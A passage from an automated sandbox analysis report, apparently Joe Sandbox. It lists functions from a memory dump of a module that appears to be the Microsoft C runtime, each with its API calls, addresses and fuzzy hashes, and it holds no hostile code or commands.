                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _fileno$_errno_ftell_nolock_lseek_write
                                                                                                          • String ID:
                                                                                                          • API String ID: 2052885585-0
                                                                                                          • Opcode ID: 0c5fd04b81430b44242aa8a5d2663642560b94af4013b95dac78be493b0f3028
                                                                                                          • Instruction ID: dee26fe62fdd42348e3c15b8bb8b8f7456823d55caa90b399226bfa5ef1a5895
                                                                                                          • Opcode Fuzzy Hash: 0c5fd04b81430b44242aa8a5d2663642560b94af4013b95dac78be493b0f3028
                                                                                                          • Instruction Fuzzy Hash: E701AD36404719EFDF904FA8C804AEA37A8EF06378F10871AE8789B1D0D739F1158B50
                                                                                                          Function 6FD84717 Relevance: 6.1, APIs: 4, Instructions: 51COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _errno_msizememsetrealloc
                                                                                                          • String ID:
                                                                                                          • API String ID: 1716158884-0
                                                                                                          • Opcode ID: 4da5c39f66805f905ecd978a4af7f25d70e91530a09b236a13e750b76182fcf1
                                                                                                          • Instruction ID: 9db392fb369e3ee0f3ce545ab198087b28483a7bdb1aeb018fd630477e6c1055
                                                                                                          • Opcode Fuzzy Hash: 4da5c39f66805f905ecd978a4af7f25d70e91530a09b236a13e750b76182fcf1
                                                                                                          • Instruction Fuzzy Hash: 47F0D677604314EFD7645F65AC94D9B3B5DEBC2265B11853BE52846180DA71B84082E0
                                                                                                          Function 6FD80CF8 Relevance: 6.0, APIs: 4, Instructions: 48COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _errno$_invalid_parameter_noinfomemcpy
                                                                                                          • String ID:
                                                                                                          • API String ID: 2912778842-0
                                                                                                          • Opcode ID: 48a40f4570b75cf50dd804eddcdfcf6df6cdf5da1d69b5921eabe914fd61701c
                                                                                                          • Instruction ID: f44aba4dedf670f4e89ad2e8fef0f2f7329bda7c91d57c8a6d7fd67c50678463
                                                                                                          • Opcode Fuzzy Hash: 48a40f4570b75cf50dd804eddcdfcf6df6cdf5da1d69b5921eabe914fd61701c
                                                                                                          • Instruction Fuzzy Hash: 88019E31546318EBDB625F24D8047CA3764AF04B94F018467F8245A190D377B990CAA6
                                                                                                          Function 6FDB8729 Relevance: 6.0, APIs: 4, Instructions: 48COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • ??0exception@std@@QAE@ABQBD@Z.MSVCR100(?), ref: 6FDB874A
                                                                                                            • Part of subcall function 6FDF35FA: ?_Copy_str@exception@std@@AAEXPBD@Z.MSVCR100(6FDC2115,?,?,6FDC2115,6FDC1F83,?,6FDC1F83,00000001), ref: 6FDF3615
                                                                                                          • _CxxThrowException.MSVCR100(?,6FE20C2C), ref: 6FDB875F
                                                                                                          • TlsGetValue.KERNEL32(?), ref: 6FDB8770
                                                                                                          • ??0invalid_operation@Concurrency@@QAE@XZ.MSVCR100 ref: 6FDB8788
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ??0exception@std@@??0invalid_operation@Concurrency@@Copy_str@exception@std@@ExceptionThrowValue
                                                                                                          • String ID:
                                                                                                          • API String ID: 4168700383-0
                                                                                                          • Opcode ID: 2de3f707ec63332f6d394316a3ce1ceea985e2082b4eb6e97a7984b7034cfca1
                                                                                                          • Instruction ID: f3cf359fe9bd57bcc18a2af3c83df3b50154d3fa298bca86a295ef76b2bb0091
                                                                                                          • Opcode Fuzzy Hash: 2de3f707ec63332f6d394316a3ce1ceea985e2082b4eb6e97a7984b7034cfca1
                                                                                                          • Instruction Fuzzy Hash: 2701B5B9504705AFC740DFA9D4C5C8EB7B9AF486157558029E9169B240EB30F506CBA1
                                                                                                          Function 6FDB8C8E Relevance: 6.0, APIs: 4, Instructions: 47COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 6FDC0376: TlsGetValue.KERNEL32(6FDC5BA3,?,00000000,?,6FDB5C77,00000001), ref: 6FDC037C
                                                                                                          • SetEvent.KERNEL32(?), ref: 6FDB8CE0
                                                                                                          • ??0context_unblock_unbalanced@Concurrency@@QAE@XZ.MSVCR100 ref: 6FDB8CF2
                                                                                                            • Part of subcall function 6FDB6B38: memset.MSVCR100(?,00000000,0000003E,00000002,?), ref: 6FDB6B57
                                                                                                          • _CxxThrowException.MSVCR100(?,6FE20C80), ref: 6FDB8D00
                                                                                                          • ??0context_self_unblock@Concurrency@@QAE@XZ.MSVCR100 ref: 6FDB8D08
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Concurrency@@$??0context_self_unblock@??0context_unblock_unbalanced@EventExceptionThrowValuememset
                                                                                                          • String ID:
                                                                                                          • API String ID: 1089900613-0
                                                                                                          • Opcode ID: af84ab5f327135a6b0220ccde2cfcd65978ef65f525174449a04579da4fe1537
                                                                                                          • Instruction ID: c4a799e5f3fe671077226dce3c3b3ea7eb7a024f5ae938463eac8b95a71f4384
                                                                                                          • Opcode Fuzzy Hash: af84ab5f327135a6b0220ccde2cfcd65978ef65f525174449a04579da4fe1537
                                                                                                          • Instruction Fuzzy Hash: BB0128F08087019BD750AB38C818A8E7BA4AF41314F10421ED863931E1EF30B406CA91
                                                                                                          Function 6FDDA6BC Relevance: 6.0, APIs: 4, Instructions: 46timeCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • _errno.MSVCR100 ref: 6FDDA6D6
                                                                                                          • _invalid_parameter_noinfo.MSVCR100 ref: 6FDDA6E1
                                                                                                            • Part of subcall function 6FDFAF7E: _invalid_parameter.MSVCR100(00000000,00000000,00000000,00000000,00000000,6FDCB6CF,?,6FDCC24B,00000003,6FDA74A4,6FD8A948,0000000C,6FDA74F7,00000001,00000001), ref: 6FDFAF85
                                                                                                          • GetLocalTime.KERNEL32(?), ref: 6FDDA6EE
                                                                                                          • _mktime32.MSVCR100(?), ref: 6FDDA72F
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: LocalTime_errno_invalid_parameter_invalid_parameter_noinfo_mktime32
                                                                                                          • String ID:
                                                                                                          • API String ID: 2934371717-0
                                                                                                          • Opcode ID: 74055ecab296265aa362ec45405b83f0b16d5d39414ef4ea91b243f63f3719e7
                                                                                                          • Instruction ID: b2bc6a72233e37b88a9138abed52f36f743e4449a3a55780f074805d50710ce4
                                                                                                          • Opcode Fuzzy Hash: 74055ecab296265aa362ec45405b83f0b16d5d39414ef4ea91b243f63f3719e7
                                                                                                          • Instruction Fuzzy Hash: E2110C71D01718DACB60DFA9C5045BEB7F4FF08711B10465AF896E6280E738EA40DB65
                                                                                                          Function 6FDB7DE9 Relevance: 6.0, APIs: 4, Instructions: 46timeCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • ?GetSharedTimerQueue@details@Concurrency@@YAPAXXZ.MSVCR100(?,00000000), ref: 6FDB7E10
                                                                                                            • Part of subcall function 6FDB7413: CreateTimerQueue.KERNEL32(00000001,?,?,00000000,?,00000000,32054ECC,00000000,?,?), ref: 6FDB743B
                                                                                                            • Part of subcall function 6FDB7413: ??0exception@std@@QAE@ABQBDH@Z.MSVCR100(?,00000001,00000001,?,?,00000000), ref: 6FDB7494
                                                                                                            • Part of subcall function 6FDB7413: _CxxThrowException.MSVCR100(32054ECC,6FD8C888,?,00000001,00000001,?,?,00000000), ref: 6FDB74A9
                                                                                                          • GetLastError.KERNEL32 ref: 6FDB7E1D
                                                                                                          • ?GetSharedTimerQueue@details@Concurrency@@YAPAXXZ.MSVCR100(?,00000000), ref: 6FDB7E2F
                                                                                                          • DeleteTimerQueueTimer.KERNEL32(00000000,?,00000000), ref: 6FDB7E35
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Timer$Concurrency@@QueueQueue@details@Shared$??0exception@std@@CreateDeleteErrorExceptionLastThrow
                                                                                                          • String ID:
                                                                                                          • API String ID: 500278849-0
                                                                                                          • Opcode ID: cb44d3664dcb0989ef0aa298d128ce32a50a3465db5685084562d1be9e5909be
                                                                                                          • Instruction ID: 77f3e0c551f06ea725980e9e4e97333dbb9e12c87a4e48c9d0e9bb1a14e55a17
                                                                                                          • Opcode Fuzzy Hash: cb44d3664dcb0989ef0aa298d128ce32a50a3465db5685084562d1be9e5909be
                                                                                                          • Instruction Fuzzy Hash: 5801D1B2210701AFE7A45F24DC85F6A77A8EF41731F014A2DE9538B5D0DB7AFC158AA0
                                                                                                          Function 6FDC0A81 Relevance: 6.0, APIs: 4, Instructions: 44COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 6FDC0376: TlsGetValue.KERNEL32(6FDC5BA3,?,00000000,?,6FDB5C77,00000001), ref: 6FDC037C
                                                                                                          • ??0improper_scheduler_attach@Concurrency@@QAE@XZ.MSVCR100(?,00000000,?,?,?,00000000), ref: 6FDC0AA0
                                                                                                            • Part of subcall function 6FDB8154: ??0exception@std@@QAE@ABQBD@Z.MSVCR100(00000000,00000000,?,?,6FDC0AA5,?), ref: 6FDB8168
                                                                                                          • _CxxThrowException.MSVCR100(?,6FE20D68,?,00000000,?,?,?,00000000), ref: 6FDC0AAE
                                                                                                            • Part of subcall function 6FD986E8: RaiseException.KERNEL32(?,?,6FDAF30F,?,?,?,?,?,6FDAF30F,?,6FD8C888,6FE28518), ref: 6FD98727
                                                                                                          • TlsSetValue.KERNEL32(00000000), ref: 6FDC0AC9
                                                                                                          • TlsSetValue.KERNEL32(00000000,?,?,?,00000000), ref: 6FDC0AF4
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Value$Exception$??0exception@std@@??0improper_scheduler_attach@Concurrency@@RaiseThrow
                                                                                                          • String ID:
                                                                                                          • API String ID: 561681975-0
                                                                                                          • Opcode ID: d93c0c3eca931664c583c39dd2abbbecfa6e01062c5c227fe3eae291c64f27b6
                                                                                                          • Instruction ID: fb64edb11a1d49bb38295afab7b9790ac56995f5c0a2a210d69a5c9972b6e7ca
                                                                                                          • Opcode Fuzzy Hash: d93c0c3eca931664c583c39dd2abbbecfa6e01062c5c227fe3eae291c64f27b6
                                                                                                          • Instruction Fuzzy Hash: 9401F2B2505714ABDB55AB78CC18A89BBF8EF453A4F05052AE016D7190EF30B911CB91
                                                                                                          Function 6FDFE480 Relevance: 6.0, APIs: 4, Instructions: 44COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • _errno.MSVCR100(?,?,6FDFC42B,00000000,?,00000000), ref: 6FDFE48D
                                                                                                          • _invalid_parameter_noinfo.MSVCR100(?,?,6FDFC42B,00000000,?,00000000), ref: 6FDFE497
                                                                                                            • Part of subcall function 6FDFAF7E: _invalid_parameter.MSVCR100(00000000,00000000,00000000,00000000,00000000,6FDCB6CF,?,6FDCC24B,00000003,6FDA74A4,6FD8A948,0000000C,6FDA74F7,00000001,00000001), ref: 6FDFAF85
                                                                                                          • mbstowcs_s.MSVCR100(00000000,?,?,00000000,000000FF,?,?,6FDFC42B,00000000,?,00000000), ref: 6FDFE4B8
                                                                                                          • _invoke_watson.MSVCR100(00000000,00000000,00000000,00000000,00000000), ref: 6FDFE4D3
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _errno_invalid_parameter_invalid_parameter_noinfo_invoke_watsonmbstowcs_s
                                                                                                          • String ID:
                                                                                                          • API String ID: 2134552197-0
                                                                                                          • Opcode ID: db9e6703e79e98e6a4c7677904d92aef54ca7ad6cc642cd26e215e2b7e88a425
                                                                                                          • Instruction ID: 198d39889ace4f8f3fc7d66c567f506bed3e96506ab6ab55dd37d424b62486b9
                                                                                                          • Opcode Fuzzy Hash: db9e6703e79e98e6a4c7677904d92aef54ca7ad6cc642cd26e215e2b7e88a425
                                                                                                          • Instruction Fuzzy Hash: 93F05471547329EB9BB22B989C40C9D36159F05B74B23863BF9148A1D0D631F59387F1
                                                                                                          Function 6FDC8F90 Relevance: 6.0, APIs: 4, Instructions: 43COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • ?_SpinOnce@?$_SpinWait@$00@details@Concurrency@@QAE_NXZ.MSVCR100(?), ref: 6FDC8FAF
                                                                                                            • Part of subcall function 6FDB5B0B: ?_SetSpinCount@?$_SpinWait@$00@details@Concurrency@@QAEXI@Z.MSVCR100(00000FA0), ref: 6FDB5B27
                                                                                                          • SetEvent.KERNEL32(?), ref: 6FDC8FC7
                                                                                                          • InterlockedPushEntrySList.KERNEL32(?,?), ref: 6FDC8FE3
                                                                                                          • SetEvent.KERNEL32(?), ref: 6FDC9002
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Spin$Concurrency@@EventWait@$00@details@$Count@?$_EntryInterlockedListOnce@?$_Push
                                                                                                          • String ID:
                                                                                                          • API String ID: 1722554412-0
                                                                                                          • Opcode ID: dc634c60cdf44ea61ad6aedc6ce8330b989f9daca5fe1e02a7ea6ddb6e8ba28c
                                                                                                          • Instruction ID: 1d642df335963087bddc5763919600bc2b72c5160804514cf2ad2854512d76fa
                                                                                                          • Opcode Fuzzy Hash: dc634c60cdf44ea61ad6aedc6ce8330b989f9daca5fe1e02a7ea6ddb6e8ba28c
                                                                                                          • Instruction Fuzzy Hash: E7015632608B14EFDBA49F24C944BCAB7F9BF06325F010669D8469B601EB30F919CB91
                                                                                                          Function 6FDFAFFE Relevance: 6.0, APIs: 4, Instructions: 42COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • _lock.MSVCR100(00000000,6FDFB0A0,00000010), ref: 6FDFB00D
                                                                                                            • Part of subcall function 6FD80910: EnterCriticalSection.KERNEL32(00000001,00000001,?,6FD81EE5,0000000D), ref: 6FD8092B
                                                                                                          • DecodePointer.KERNEL32(6FDFB0A0,00000010), ref: 6FDFB026
                                                                                                          • DecodePointer.KERNEL32(6FDFB0A0,00000010), ref: 6FDFB043
                                                                                                          • _encoded_null.MSVCR100 ref: 6FDFB05C
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: DecodePointer$CriticalEnterSection_encoded_null_lock
                                                                                                          • String ID:
                                                                                                          • API String ID: 2803190587-0
                                                                                                          • Opcode ID: 5a302173648fcd733e711dea21446e17939cf89566893bd66d847546e8c600f1
                                                                                                          • Instruction ID: 671b9414076595323bf7757ebd97be2f2f01a5d9a08ef1e912a7d04b4c5c3b8d
                                                                                                          • Opcode Fuzzy Hash: 5a302173648fcd733e711dea21446e17939cf89566893bd66d847546e8c600f1
                                                                                                          • Instruction Fuzzy Hash: 1C01B135C4270BCEDF919F648908AADBAB1EB47325F21452AC031A61D4D7357543EF14
                                                                                                          Function 6FDD2915 Relevance: 6.0, APIs: 4, Instructions: 42COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • _errno.MSVCR100(00000000,00000000,?,6FDD2A8B,?,000000FF,?,00000000,00000000), ref: 6FDD2922
                                                                                                          • _invalid_parameter_noinfo.MSVCR100(00000000,00000000,?,6FDD2A8B,?,000000FF,?,00000000,00000000), ref: 6FDD292D
                                                                                                            • Part of subcall function 6FDFAF7E: _invalid_parameter.MSVCR100(00000000,00000000,00000000,00000000,00000000,6FDCB6CF,?,6FDCC24B,00000003,6FDA74A4,6FD8A948,0000000C,6FDA74F7,00000001,00000001), ref: 6FDFAF85
                                                                                                          • free.MSVCR100(00000000,00000002,00000000,00000000,00000000,00000000,00000000,00000000), ref: 6FDD2971
                                                                                                          • free.MSVCR100(00000000,00000000,00000002,00000000,00000000,00000000,00000000,00000000,00000000), ref: 6FDD2979
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: free$_errno_invalid_parameter_invalid_parameter_noinfo
                                                                                                          • String ID:
                                                                                                          • API String ID: 4554520-0
                                                                                                          • Opcode ID: 7cce8eb0cc32eb52d18113ebcda93601ad73d19730f340396eb66d676776fd7b
                                                                                                          • Instruction ID: ac29015a5530e055d4ebbfdf1a94e6383356969fe363c5c38b60379512c3d186
                                                                                                          • Opcode Fuzzy Hash: 7cce8eb0cc32eb52d18113ebcda93601ad73d19730f340396eb66d676776fd7b
                                                                                                          • Instruction Fuzzy Hash: A401FB72801208FBCF415F94CC05EDD7B69AF05368F504255B929A50E0E771AB909BA0
                                                                                                          Function 6FDFEE60 Relevance: 6.0, APIs: 4, Instructions: 40stringCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • _errno.MSVCR100(?,?,?,6FDFDAC9,00000000,?,00000000), ref: 6FDFEE6E
                                                                                                          • _invalid_parameter_noinfo.MSVCR100(?,?,?,6FDFDAC9,00000000,?,00000000), ref: 6FDFEE78
                                                                                                            • Part of subcall function 6FDFAF7E: _invalid_parameter.MSVCR100(00000000,00000000,00000000,00000000,00000000,6FDCB6CF,?,6FDCC24B,00000003,6FDA74A4,6FD8A948,0000000C,6FDA74F7,00000001,00000001), ref: 6FDFAF85
                                                                                                          • strncpy_s.MSVCR100(?,?,00000000,?,?,?,?,6FDFDAC9,00000000,?,00000000), ref: 6FDFEE9C
                                                                                                          • _invoke_watson.MSVCR100(00000000,00000000,00000000,00000000,00000000), ref: 6FDFEEAD
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _errno_invalid_parameter_invalid_parameter_noinfo_invoke_watsonstrncpy_s
                                                                                                          • String ID:
                                                                                                          • API String ID: 3344576844-0
                                                                                                          • Opcode ID: 02ba4e05f6feedd975f4bf243cc99453f459085dabea20648c5a8f2298ebc26f
                                                                                                          • Instruction ID: 3a7bacef8626d57c08d1e2986de80b17c3214794d03db42738c11337edbe53d1
                                                                                                          • Opcode Fuzzy Hash: 02ba4e05f6feedd975f4bf243cc99453f459085dabea20648c5a8f2298ebc26f
                                                                                                          • Instruction Fuzzy Hash: 88F0A772101318AB97916FA5EC04CEF3B6CDF816B4B124022FD2C8B190DB73B94386B0
                                                                                                          Function 6FD9235F Relevance: 6.0, APIs: 4, Instructions: 40COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • GetEnvironmentStringsW.KERNEL32(00000000,6FDB0857,?,00000000,?,6FD90D27,?,6FD90D48,0000000C), ref: 6FD92362
                                                                                                          • _malloc_crt.MSVCR100(00000002,?,?,?,6FD90D27,?,6FD90D48,0000000C), ref: 6FD92391
                                                                                                          • memcpy.MSVCR100(00000000,00000000,00000002,?,?,?,6FD90D27,?,6FD90D48,0000000C), ref: 6FD923A0
                                                                                                          • FreeEnvironmentStringsW.KERNEL32(00000000,?,?,?,6FD90D27,?,6FD90D48,0000000C), ref: 6FD923A9
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: EnvironmentStrings$Free_malloc_crtmemcpy
                                                                                                          • String ID:
                                                                                                          • API String ID: 202606007-0
                                                                                                          • Opcode ID: dda54d9b884cf8147f97697172e868c6fc61f24a11c9e23228e88b3fe85af96a
                                                                                                          • Instruction ID: 8dc60324bec6b07ee0ec882594debdad33f337c190a116bc0d0971c9c186e220
                                                                                                          • Opcode Fuzzy Hash: dda54d9b884cf8147f97697172e868c6fc61f24a11c9e23228e88b3fe85af96a
